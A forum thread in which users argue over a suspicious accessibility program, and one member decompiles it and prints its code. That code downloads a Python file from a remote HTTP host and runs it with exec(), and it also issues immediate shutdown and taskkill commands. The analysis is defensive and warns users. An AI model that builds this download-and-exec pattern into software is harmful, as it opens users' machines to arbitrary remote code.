hi.
@giorgi, yeah, his acapela tts forced me to take my computer to a person to format it.
my computer was working in windows xp.
one day, when I published on the arabic forums about him and his viruses, he called me, along with hamad alqasar and others, and said to me: if you don't want to reedit your post, saying that I'm not a hacker and a virus maker, I'll hack your computer using kali linux.
in that time, I was forced to edit my post because you know guys, windows xp is unsopported from microsoft and can be hacked easily.
@alireza, you're right.

@urh that's the thing you won't know what he is doing, he's gonna do it silently. @yousuf hamad alkasar the same person who cloned CM too? i'd ignore the hack threats if i were you if you are secure they can't do shit.
@urh i didn't get hacked by him because i was sane and took the warnings seriously, but my friend got hacked by his addon.
@
hey ahmad star or whoever you are, try your best to hack me. i'm waiting for you to hack me.

Ahmed has being on SBYW 15 minutes a go. I've asked him to tell me his surname but he didn+t replied. Also, I will not use an addon, it's an exe file like a program. And one more time, Baby, the user on this forum has tested it.

EXE? even more dangerous. and even if you give 69 billion people to test it i'll still not trust that guy and his products.

OK, OK. Everyone cool it. As we speak I am sandboxing the program and am going to post my findings once I have unpacked the setup files and can get access to the actual executable (the setup itself is not harmful, according to virus total). Analyzing the installed program in my sandbox, I notice many things off of the bat, one of which is notable -- this program is written in Python! Python 3.6, to be precise. Extracting the setup file ("installing" it in my sandbox) and extracting the .exe file, I see the pyinstaller archive files, and now I have the compiled python bytecode. At this stage decompilation is trivial: I see that the app has the standard python stdlib, chardot, and this file called... MEX.pyc. Mmm... and what could this be?
Oh dear! Some suspicious code! Looky, friends:

import glob, wx, urllib.request, re, sys, webbrowser, threading, subprocess, os, locale, win32clipboard, pyperclip, datetime, time, ctypes, gettext
from html2text import html2text
from playsound import playsound
import encodings.idna
get = os.environ['temp']
item = urllib.request.urlretrieve('http://softjewel.droppages.com/MultiExtra/Data/MAX.py', 'MAX.py')
exec(open('MAX.py').read())

Looking at this "max.py" file...
First, it imports its "needed" modules. Then... there's this exception handler that gets it to try to remove itself from the file system. Should that fail, it does nothing.
Next, it trys to change to c:\ProgramData\MultiExtra. Not sue how that'll work since the app doesn't create it (maybe the setup does?). It then creates an appdata folder and creates its multiextra.ini file.
The worying thing however is how many downloads this thing does. There's another download on line 92 (the rest of the above discussion is just it doing its normal configuration) that it reads from using the URL http://softjewel.droppages.com/MultiExtra/Data/MAX.txt. (Note the lack of 'https'.) This file... doesn't seem to contain anything, if I browse to it. It also links to NVDA as well. (Note that this is the "actual" NVDA file, and is not malicious -- just version 2018.1.1, but it replaces that with the latest version on softpedia for some reason.)
We're not done though! This program also seems to do some very disturbing subprocess calls. In particular:
Line 474: subprocess.Popen("taskkill /f /pid {pid} /t".format(pid=self.process.pid), startupinfo=info)
It also runs command prompt:
Line 560: subprocess.Popen("cmd.exe /c pushd " + self.DPath + " & start MultiExtraDownloads\Apps", startupinfo=info)
And this...
Line 562: subprocess.Popen("shutdown.exe -s -t 0", startupinfo=info)
And, of course, the end of the application, when it try's to taskkill itself instead of exiting properly:
Line 2,195: subprocess.Popen("taskkill /f /im MultiExtra.exe", startupinfo=info, shell=True)
Some things to note with these subprocess calls:
* Line 474: subprocess.Popen("taskkill /f /pid {pid} /t".format(pid=self.process.pid), startupinfo=info): This one isn't harmful -- unless, of course, he sets it to something like csrss's PID or another critical system process if he's able to gain that level of privilege.
* Line 560: subprocess.Popen("cmd.exe /c pushd " + self.DPath + " & start MultiExtraDownloads\Apps", startupinfo=info): this one is... entirely unnecessary and pointless. I don't get it. I don't really get what its trying to do (I think "MultiExtraDownloads\Apps" is some kind of executable or batch script or something like that).
* Line 562: subprocess.Popen("shutdown.exe -s -t 0", startupinfo=info): -s shuts down the computer, only; -t (/t) ells it to do an immediate shutdown.
There are also some other os.remove calls that are in here. I'd be happy to fully decompile all the code and upload it somewhere for people like cartertemm to go over and review.
As for the "this program steels files" accusation, I'm checking on that.
OK, I can't confirm that either way. It doesn't use shutil or networking -- that I can see anyway, other than urllib. It doesn't use shutil so it can't do any bulk copys, and it doesn't use os.rename, os.renames, or os.link/os.unlink, nor does it contact any remote servers via obscure protocols. Not that I can find, at any rate. So I think that for now we can discard that accusation (though don't bank on that, I didn't decompile the entire program tree).
In sum: the program does some disturbing activity which I'd like others to take up (I'm not going to read the entire program). On the surface it is *not* harmful. I repeat: it is *not* harmful on the surface. However, I would hold off accusations and destructive comments until people like cartertemm (and even myself if I decide to dive into that mess of code) can fully analyze it. In the meantime, I would hold off on using it lest you get hit by something we have not found.

@37, the shutdown call may be linked to an option that allows you to shutdown a computer after its done doing something. That's not the first timeI've seen something like that in an app; DSpeech has something like that as well and people used to (and probably still do) use it all the time. However, I don't truly know so am being cautious.

Blind Extra did something similar I believe. It downloaded then executed some Python file that could do just about anything...

39-41, exactly why I recommended people don't use it until we can examine it further. The fact that it immediately downloads code when you run it is incredibly suspicious and brings into question what the developer is trying to do. All three of you are correct in saying that, since the code is hosted on a server it could be changed. The fact that it calls exec and not some kind of sanatized eval (I don't get why you'd use eval or exec, period; its dangerous) makes it a threat. The code can do literally anything it likes so long as its valid syntax.

@43, I did what I could, though I could've done better. I think I got my point across pretty nicely with what I did though.

Oh my god, do I really need to say that again: Baby has maded a review of it. And I have an idea, I have an old computer that I no longer use so I will try to install it on my old computer and I will see what happens.

I give up. If you're okay with the author being able to see what porn you watch or whatever, then I guess that's your choice...